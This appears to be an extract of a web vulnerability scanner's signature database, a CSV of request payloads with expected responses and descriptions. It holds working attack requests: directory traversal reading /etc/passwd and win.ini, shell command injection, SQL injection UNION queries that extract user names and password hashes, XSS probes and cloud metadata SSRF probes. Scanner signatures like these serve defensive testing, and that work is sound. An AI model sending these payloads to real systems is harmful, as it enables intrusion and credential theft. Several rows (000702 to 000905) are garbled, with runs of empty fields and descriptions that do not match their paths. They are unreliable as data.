"000652","https://vulners.com/osvdb/OSVDB:15392","5","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","GET","root:","","","","","Wordit Limited 2000 allows command execution.","","" "000653","","5","@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","GET","root:","","","","","Remote file retrieval.","","" "000654","OSVDB-59084","5","/page.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.","","" "000655","OSVDB-56290","5","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","GET","root:","","","","","EditTag allows arbitrary file retrieval.","","" "000656","CVE-2001-1408","5","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","GET","root:","","","","","Remote file retrieval.","","" "000659","CVE-2001-1209","5","@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","Ztreet Markup Language interpreter allows arbitrary files to be read remotely.","","" "000660","","5","@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI lets users read any file with http daemon's permissions. Upgrade to latest version","","" "000661","CVE-1999-1063","5","@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd","GET","root:","","","","","Allows attacker to view any file (and possibly execute commands). Upgrade to latest version","","" "000662","","5","@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000663","","5","@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","","" "000664","CVE-2001-0211","5","@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000665","","5","@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to retrieve files remotely.","","" "000666","","5","@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000667","CVE-2004-1782","8","/athenareg.php?pass=%20;cat%20/etc/passwd","GET","root:","","","","","Athena web registration remote command execution.","","" "000668","CVE-2000-1196","7","/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd","GET","root:","","","","","This default Netscape file allows an attacker to read arbitrary files on the host.","","" "000669","","5","/search?NS-query-pat=../../../../../../../../../../etc/passwd","GET","root:","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000670","","5","/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini","GET","boot loader","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","","" "000671","","7","/..\..\..\..\..\..\temp\temp.class","GET","200","","","","","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.","","" "000672","","7","/../../../../../../../../../../etc/passwd","GET","root:","","","","","It is possible to read files on the server by adding ../ in front of file name.","","" "000673","","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","","" "000674","","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","","" "000675","","3","/%3f.jsp","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","","" "000677","CVE-2000-0664","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","\[windows\]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","","" "000678","","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","","" "000679","","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","","" "000680","","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","\[windows\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000681","","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000682","","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","\[fonts\]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","","" "000683","CVE-2002-0308","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","","" "000684","CVE-2006-6795","9","@NUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","","" "000685","","9","@CGIDIRSclassifieds/index.cgi","GET","200","","","","","My Classifieds pre 2.12 is vulnerable to SQL injection attacks.","","" "000686","CVE-2003-0025","9","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","GET","parse error","","","","","IMP 2.x allows SQL injection, and reveals system information.","","" "000687","CVE-2002-0216","9","/userinfo.php?uid=1;","GET","Query\sError:","","","","","Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.","","" "000688","","9","/site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers%20WHERE%20username=USER%20--/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execution of SQL","","" "000689","","9","/site/'%20UNION%20ALL%20SELECT%20FileToClob('/etc/passwd','server')::html,0%20FROM%20sysusers%20WHERE%20username%20=%20USER%20--/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL injection.","","" "000690","","9","/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000691","","9","/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000692","","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000693","","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","","" "000694","CVE-2003-1216","9","/phpBB2/search.php?search_id=1\\","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","","" "000695","","9","/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*","GET","\(\.\+\?\)","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","","" "000696","CVE-2002-1499","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.","","" "000697","CVE-2004-0584","4","/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000698","CVE-2004-0584","4","/imp/horde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000699","CVE-2004-0584","4","@CGIDIRShorde/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS).","","" "000700","https://seclists.org/fulldisclosure/2003/Jun/494","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.","","" "000701","https://seclists.org/fulldisclosure/2003/Jun/494","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages.","","" "000702","CVE-2003-1204","4","/themes/mambosimple.php?detection=detected&sitename=","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","\[SQL SERVER\] Error Code","","","","","ColdFusion may reveal SQL information in malformed requests.","","" "000717","","4","/upload.php?type=\"","GET","","GET",";","GET","","GET","666.jsp","GET","","GET","","GET","","GET","","GET","","GET","","GET",".shtm","GET",".stm","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",";","GET","","GET","","GET","","GET","","GET","","GET","&file=1&keywords=vulnerable","GET","","GET","","GET","","GET",";","GET","&Where=&Sort=Photo&Dir=","GET","","GET",".aspx?aspxerrorpath=null","GET",".aspx","GET",".asp","GET","&rollid=admin&x=3da59a9da8825&","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000773","CVE-2004-0584","4","/webamil/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS).","","" "000774","OSVDB-59444","4","/users.php?mode=profile&uid=<script>alert(document.cookie)</script>","GET","","GET","","GET","","GET","</script>","GET","</script>","GET","</script>","GET","","GET","&story=&storyext=&op=Preview","GET","","GET","&page=list_users&user=P","GET","","POST","","POST","","GET","","GET","","GET","","GET","","GET","","GET","","GET","alert\('Vulnerable'\)<\/script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this).","","" "000800","","4","/script>alert('Vulnerable').cfm","GET","&logic=AND","GET","","GET","","GET","","GET","%3Ca%20s=%22&code=1","GET","","GET","&MMN_position=[X:X]","GET","","GET","","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000814","CVE-2002-1995","4","/phptonuke.php?filnavn=","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","200","","","","","OpenAutoClassifieds 1.0 is vulnerable to a XSS attack","","" "000828","CVE-2003-1145","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&fid=2","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&month=3&month_l=test","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","<","GET","","GET","&PhraseSearchText=&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",";","GET","","GET","&comment=&pid=0&sid=0&mode=&order=&thold=op=Preview","GET","","GET","&email1=","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS).","","" "000905","https://vulners.com/osvdb/OSVDB:651","4","/cgi-local/cgiemail-1.6/cgicso?query=","GET","","GET","&month=03&day=05","GET","","GET","&PATH=acatalog%2f","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","&op=browse","GET",".thtml","GET",".shtml","GET",".jsp","GET",".aspx","GET",".jsp","GET","","GET",";","GET","&addressemail=junk@example.com","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET",">","GET","","GET","","GET","","GET",">&tzone=dmz","GET","","GET","&startline=0","GET","&startline=0(naturally)","GET",",/system/status/session","GET",",/system/status/moniter,/system/status/session","GET","&button_url=/system/status/status,/system/status/moniter,/system/status/session","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","GET","","Cisco\sUCS\sDirector","200","","","Generic login page (possible Cisco UCS Director) detected.","","" "007266","","3","http://169.254.169.254/hetzner/v1/metadata/private-networks","GET","alias_ips:","","","","","The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007267","","3","http://192.0.0.192/latest/","GET","user-data","","","","","The Oracle Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: \192.0.0.192\r\naccept: */*\r\nProxy-Connection: Keep-Alive\r\n" "007268","","3","http://169.254.169.254/metadata/instance?api-version=2017-08-01","GET","instance\/","","","","","The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\naccept: */*\r\nMetadata: true\r\n" "007269","CVE-2019-19781 https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/","8","/vpn/../vpns/cfg/smb.conf","GET","(name\sresolve\sorder|encrypt\spasswords)\s*=","^\[global\]","200","","","Citrix ADC and Citrix Gateway are vulnerable to a local file inclusion (LFI) vulnerability.","","" "007270","","23","/whoAmI","GET","IsAuthenticated","","","","","The Jenkins \"Who Am I?\" page is exposed and may reveal system/app information.","","" "007271","","3","/.coveralls.yml","GET","repo_token","","","","","A Coveralls.io file is exposed and contains a repository token, which could allow access to source control","","" "007272","","3","/nginx_status","GET","Active\sconn","","","","","Nginx status page found","","" "007273","","3","/Dockerfile","GET","FROM\s","ENTRYPOINT\s","ENV\s","","","Dockerfile found.","","" "007274","","3","/cdn-cgi/trace","GET","visit_scheme=","","","","","Cloudflare trace CGI found, which may leak some system information.","","" "007275","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v1/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007276","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v2/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007277","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v3/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007278","https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html","3","/v4/tasks","GET","KnownStatus","","","","","Amazon Elastic Container Service metadata URL found which may leak open ports and other information.","","" "007279","","23","/.dockerignore","GET","200","","","","",".dockerignore file found. It may be possible to grasp the directory structure and learn more about the site.","","" "007280","CVE-2020-5902","7","/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts","GET","\{\"output\":\"","","","","","The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.","","" "007281","","be","/","GET","BIG-IP®- Redirect","","200","","","F5 BIG-IP Traffic Management User Interface (TMUI) detected.","","" "007282","","1","/var/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","/var directory has indexing enabled.","","" "007283","","1","/var/log/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","/var directory has indexing enabled.","","" "007284","","1","/etc/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","'/etc directory has indexing enabled.","","" "007285","","12","/.ftpconfig","GET","\"port\":","","","","","This file may contain login credentials.","","" "007286","","12","/.remote-sync.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007287","","12","/.vscode/ftp-sync.json","GET","\"port\":","","","","","This VSCode file may contain login credentials.","","" "007288","","12","/.vscode/sftp.json","GET","\"port\":","","","","","This VSCode file may contain login credentials.","","" "007289","","12","/deployment-config.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007290","","12","/ftpsync.settings","GET","\"port\":","","","","","This file may contain login credentials.","","" "007291","","12","/sftp-config.json","GET","\"port\":","","","","","This file may contain login credentials.","","" "007292","","1","/Service/","GET","You have created a service","","","","","WCF endpoint found.","","" "007293","","1","/Services/","GET","You have created a service","","","","","WCF endpoint found.","","" "007294","","1","/Services/BackOfficeService.svc?wsdl","GET","You have created a service","","","","","WCF endpoint found.","","" "007295","","1","/Service/BackOfficeService.svc?wsdl","GET","You have created a service","","","","","WCF endpoint found.","","" "007296","","1","/Service/Service.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007297","","1","/Services/Service`.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007298","","1","/Service/Service1.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007299","","1","/Services/Service1`.svc","GET","You have created a service","","","","","WCF endpoint found.","","" "007300","","1","/BackOffice/Services/","GET","You have created a service","","","","","WCF endpoint found.","","" "007301","","3","/phpci.yml","GET","build_settings:","","","","","PHP CI config file found.","","" "007302","","1","/README.md","GET","200","","","","","Readme Found","","" "007303","CVE-2013-6235","3","/JAMonAdmin.jsp","GET","\| JAMonAdmin \|","","200","","","JAMon - Java Application Monitor Admin interface identified. Versions 2.7 and earlier contain XSS vulnerabilities.","","" "007304","CVE-2020-5902","7","/hsqldb;","GET","HSQL Database Engine Servlet","","","","","The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec.","","" "007305","https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","","" "007306","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://169.254.169.254/latest/meta-data/","GET","iam/","","","","","The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007307","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://169.254.169.254/latest/dynamic/instance-identity/document","GET","privateIp","","","","","The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007308","https://cloud.google.com/compute/docs/storing-retrieving-metadata","2","http://169.254.169.254/computeMetadata/v1/project/","GET","attributes\/","","","","","The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\nMetadata-Flavor: Google" "007309","https://docs.openstack.org/nova/latest/admin/metadata-service.html","2","http://169.254.169.254/openstack/latest","GET","vendor_data\.json","","","","","The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007310","https://developers.digitalocean.com/documentation/metadata/","2","http://169.254.169.254/metadata/v1.json","GET","droplet_id","","","","","The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: 169.254.169.254\r\n" "007311","https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/","2","http://rancher-metadata/2015-07-25/","GET","containers\/","","","","","The Rancher host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: \rancher-metadata\r\n" "007312","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://aws.cirt.net/latest/meta-data/","GET","iam/","","","","","The host is configured as a proxy which allows access to the AWS Meta-Data service. With some IAM role permissions this could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007313","https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html","2","http://aws.cirt.net/latest/dynamic/instance-identity/document","GET","privateIp","","","","","The AWS host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007314","https://cloud.google.com/compute/docs/storing-retrieving-metadata","2","http://aws.cirt.net/computeMetadata/v1/project/","GET","attributes\/","","","","","The Google Cloud Platform host is configured as a proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\nMetadata-Flavor: Google" "007315","https://docs.openstack.org/nova/latest/admin/metadata-service.html","2","http://aws.cirt.net/openstack/latest","GET","vendor_data\.json","","","","","The OpenStack host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007316","https://developers.digitalocean.com/documentation/metadata/","2","http://aws.cirt.net/metadata/v1.json","GET","droplet_id","","","","","The DigitalOcean host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007317","","3","http://aws.cirt.net/metadata/instance?api-version=2017-08-01","GET","instance\/","","","","","The Azure host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007318","","3","http://aws.cirt.net/hetzner/v1/metadata/private-networks","GET","alias_ips:","","","","","The Hetzner Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.","","Host: aws.cirt.net\r\n" "007319","","e","/graphql","GET","GraphQL\sPlayground","","","","","The GraphQL Playground may allow direct querying of the database","","" "007320","","35","/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","GET","INTERNAL_PASSWORD_ENABLED","","","","","Cisco VPN host is vulnerable to CVE-2020-3452 which may allow disclosure oof information","","" "007321","","23","@WORDPRESSwp-config.php","GET","DB_NAME","","","","","wp-config.php file found without PHP processing. This file contains the database credentials.","","" "007322","","1","/sellers.json","GET","\"seller_id\"","\"domain\"","","","","The sellers.json file can reveal information about Google Adwords or other advertising networks in use.","","" "007323","","1","/ads.txt","GET","DIRECT","google.com,","","","","The ads.txt file can reveal information about Google Adwords or other advertising networks in use.","","" "007324","","be","/session_login.cgi","GET","Webmin","","enter a username","","","Webmin allows system administration via root login","","" "007325","","8","/radio.php","GET","Login Page","","password","","","PHP backdoor found.","","" "007326","","1","/app-ads.txt","GET","DIRECT","google.com,","","","","The ads.txt file can reveal information about Google Adwords or other advertising networks in use.","","" "007327","RFC-5785","3","/.well-known/jwks","GET","keys","","kty","","","JWKS file found","","" "007328","https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment","1","/certsrv/certfnsh.asp","GET","Active Directory Certificate Services","","200","","","Active Directory Certificate Services found","","" "007329","https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-authority-web-enrollment","1","/certsrv/certfnsh.asp","GET","401","","","","","Active Directory Certificate Services found (requires authentication)","","" "007330","https://getcomposer.org/","23","/vendor/composer/installed.json","GET","\"(require|name)\":\s","","","","","PHP Composer configuration file reveals configuration information.","","" "007331","https://getcomposer.org/","23","/.composer/composer.json","GET","\"(require|name)\":\s","","","","","PHP Composer configuration file reveals configuration information.","","" "007332","https://swagger.io/","e3","/swagger/index.html","GET","Swagger UI","","","","","Swagger UI was found.","","" "007333","","e","/graphql","GET","category\"\:\"graphql","","","","","GraphQL endpoint found","","" "007334","","b","/","GET","Cockpit\sfrom\srunning","","","","","Cockpit server admin is running. https://cockpit-project.org/","",""